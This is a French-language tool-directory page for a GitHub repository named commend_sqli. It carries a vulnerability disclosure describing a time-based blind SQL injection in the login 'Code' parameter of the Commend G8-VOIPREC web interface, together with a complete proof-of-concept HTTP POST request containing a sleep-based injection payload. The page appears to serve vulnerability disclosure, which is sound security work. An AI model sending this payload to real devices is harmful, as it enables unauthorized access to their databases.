Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
commend_sqli | Kitploit
Outils/GitHubGitHub/jet-pentest/commend_sqli
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubjet-pentest/commend_sqli

commend_sqli

Voir le dépôt
il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-XXXXX

[Description suggérée]

L'interface web de G8-VOIPREC (Commend VoIPRec) est vulnérable à des injections SQL aveugles basées sur le temps dans le paramètre « Code » de la page de connexion.

[Informations supplémentaires]

PoC:

POST /cgi-bin/SecComRecX.cgi HTTP/1.1 Host: 192.168.88.10 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 78 Origin: http://192.168.88.10 Connection: close Referer: http://192.168.88.10/ComRecX/comrecxapp.html

Action=request&Code=userpasswordasdasd'%2b(select*from(select(sleep(6)))a)%2b'

[Type de vulnérabilité]

SQL Injection

[Fournisseur du produit]

Commend International

[Code de base du produit affecté]

G8-VOIPREC

[Type d'attaque]

À distance

[Impact : divulgation d'informations]

true

[Vecteurs d'attaque]

Un utilisateur distant peut utiliser un code SQL malveillant pour manipuler la base de données du backend afin d'accéder à des informations qui n'étaient pas destinées à être affichées.

[Découvreur]

Alexander Starikov (Jet Infosystems, jet.su), Ivashchenko Sergey (Jet Infosystems, jet.su)

[Référence]

https://www.commend.com/

Télécharger l’outil